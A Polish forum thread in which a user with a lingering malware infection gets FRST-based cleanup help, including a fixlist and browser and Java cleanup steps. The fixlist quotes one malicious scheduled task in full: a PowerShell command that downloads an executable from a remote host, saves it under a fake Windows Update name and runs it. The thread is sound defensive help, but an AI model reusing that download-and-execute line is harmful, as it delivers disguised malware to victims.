Problem z Powershell

windows10

(dolceskorpion) #1

Mam problem z Powershell nawet po usunięciu malware którego się nabawiłem, problem polega na tym że od czasu do czasu Powershell samemu się uruchamia włącza jakiś skrypt i się wyłącza co wywala mnie z programu czy gry. Jest jakiś sposób na rozwiązanie tego problemu?


(krystian3w) #2
Spoiler

Obstawiałbym że niedoczyszczona infekcja (jak czyściłeś, może na innym forum).

Przejrzyj czy nie masz jakiś dziwnych zaplanowanych zadań np. w Autoruns.

https://www.dobreprogramy.pl/AutoRuns,Program,Windows,13208.html


A jak nie wiesz co usunąć to zrób logi z FRST i specjalista działu bezpieczeństwo usunie:


(dolceskorpion) #3

Dzięki za odpowiedź,nie wiem komu dokładniej dać te logi z FRST więc tutaj je dam:
FRST.txt (59,2 KB)


(dolceskorpion) #4

Addition.txt (78,7 KB)


(Atis) #5

Odinstaluj McAfee Security Scan Plus i Spybot - Search & Destroy.

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== UWAGA
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
GroupPolicy: Ograniczenia <==== UWAGA
GroupPolicy\User: Ograniczenia <==== UWAGA
SearchScopes: HKU\S-1-5-21-495987239-2747019522-460319899-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = 
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
U3 idsvc; Brak ImagePath
S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
2017-05-05 19:08 - 2017-03-06 19:08 - 000000032 ____R () C:\ProgramData\hash.dat
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Brak pliku
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} =>  -> Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
Task: {00467BA6-0C78-4B54-92AF-440061C6C7B7} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Brak pliku <==== UWAGA
Task: {0507566F-CA70-436A-9409-67C48BBD48AB} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA
Task: {18259C59-E853-460A-AA2C-D45E530C25EC} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {19B2C6C8-8F55-4DC1-8C9E-D8F658AC08B3} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {1AE8A903-9B46-4880-A0B0-2943667966E0} - \{418069A5-E800-4262-8243-4BEA9D998BE4} -> Brak pliku <==== UWAGA
Task: {1B0F4BF4-EDAB-4138-9158-57C6A786EF16} - \Microsoft\Windows\Setup\gwx\rundetector -> Brak pliku <==== UWAGA
Task: {1ECF539B-4C25-40F9-9883-793BC13047AC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {1F96C36D-FD2F-4C4A-BBF8-5882DC9F606F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
Task: {246011EA-E4B1-4DD0-B947-4A8EB1074E9C} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {2AD8D57E-26B5-486F-B138-F4C84324872D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {34B9CDFF-5000-44C2-BFD3-0FD86B7EA61F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
Task: {393DB6B1-978B-45CA-8EE4-DEB2A6B1CEBC} - \Microsoft\Windows\Setup\EOONotify -> Brak pliku <==== UWAGA
Task: {4359647D-95F0-4C0C-BA65-B075FDAF260A} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
Task: {506638C6-B254-4C7E-B4CD-A8EFE29D518A} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {535DCF7A-32FF-4A9C-A5F3-A82C0DE84677} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {5D3981C3-8A39-4FEE-B869-13A18F1C8679} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {60A462BF-8480-45D7-B5D4-9743D5C401DA} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku <==== UWAGA
Task: {66F6DE73-0200-4531-9D64-E5E0440CD71C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
Task: {7190DB96-025D-4B43-826C-6E220D997FC0} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {75D6DF2E-B5CA-450B-AC27-67D39106E92C} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {78CCB78A-2A1C-4423-8376-1FA7934DEF13} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {7E71869A-8C2B-422A-904C-B2B93F6344E1} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {85CCCF90-684B-4BCB-A237-61B9A4FB88B7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA
Task: {8C2B46BC-F592-456E-8A4E-BF2835C435A6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA
Task: {9676B150-AC54-4BB9-85E5-C0974769AFE3} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A8963CC9-C743-4ADE-8A75-7ADA2B1E9605} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA
Task: {AF8B6FDA-EF42-4E36-810D-9C055091B515} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B5CE5DB7-7E28-44C2-90F6-41003BF73C1A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA
Task: {B761F39E-60E8-4090-A105-5169856BD72B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {C9961ACF-956A-4CF9-AC2B-605E5C604E7D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
Task: {D29E4279-BDD8-4712-B0BC-C5106B69A5C5} - System32\Tasks\7D3066DB4F59 => "powershell" (New-Object System.Net.WebClient).DownloadFile("hxxp://samplehighz.net/gpr.exe","C:\WINDOWS\SysWOW64\WindowsUpdate_KB6210840.exe");&&C:\WINDOWS\SysWOW64\WindowsUpdate_KB6210840.exe i
Task: {D469A6B4-222E-46FE-9CF2-22A52840B249} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {DF8A7942-4C1F-45D8-A232-837EDD9FB85B} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E0C866EC-E2DA-4166-A4CE-670046449A97} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {F0AB6BA6-E1C4-481B-9CFE-28EAF5E1F1F7} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {F4064CBF-D616-4DD4-A84D-E4408B52E37D} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {F5A6D018-F3CB-4037-A97B-51DEB2C04A06} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA
Task: {FAC10F42-5D50-46D0-B277-4D81592FBF55} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA
Task: {FC082100-543D-4CD1-B687-8897DBB4B19A} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {FDCB445B-0034-486B-A91A-2C04531F2A14} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Shortcut: C:\Users\$korpion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ВКонтакте.lnk -> C:\Users\$korpion\AppData\Local\Amigo\Application\amigo.exe (Brak pliku) <==== Cyrillic
Shortcut: C:\Users\$korpion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Одноклассники.lnk -> C:\Users\$korpion\AppData\Local\Amigo\Application\amigo.exe (Brak pliku) <==== Cyrillic
Shortcut: C:\Users\$korpion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Amigo\ВКонтакте.lnk -> C:\Users\$korpion\AppData\Local\Amigo\Application\amigo.exe (Brak pliku) <==== Cyrillic
Shortcut: C:\Users\$korpion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Amigo\Мини-игры Mail.Ru.lnk -> C:\Users\$korpion\AppData\Local\Amigo\Application\amigo.exe (Brak pliku) <==== Cyrillic
Shortcut: C:\Users\$korpion\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Amigo\Одноклассники.lnk -> C:\Users\$korpion\AppData\Local\Amigo\Application\amigo.exe (Brak pliku) <==== Cyrillic
Shortcut: C:\Users\$korpion\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ВКонтакте.lnk -> C:\Users\$korpion\AppData\Local\Amigo\Application\amigo.exe (Brak pliku) <==== Cyrillic
Shortcut: C:\Users\$korpion\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk -> C:\Users\$korpion\AppData\Local\Amigo\Application\amigo.exe (Brak pliku) <==== Cyrillic
C:\Users\$korpion\AppData\Local\Amigo
Hosts:
EmptyTemp:

Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(dolceskorpion) #6

Raport z Fixloga Fixlog.txt (31,5 KB)


(dolceskorpion) #7

Raport z FRST FRST.txt (56,3 KB)


(Atis) #8

Chrome:

  1. Resetowanie synchronizacji Chrome
  2. Przywracanie ustawień domyślnych Chrome
  3. Zainstaluj uBlock: Firefox - Chrome - Opera

Skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu
Odinstaluj Java 7 Update 51 i zainstaluj Java 8 Update 151


(dolceskorpion) #9

Wszystko zrobione,czy coś jeszcze trzeba zrobić? Jeżeli nie to BARDZO Dziękuje za pomoc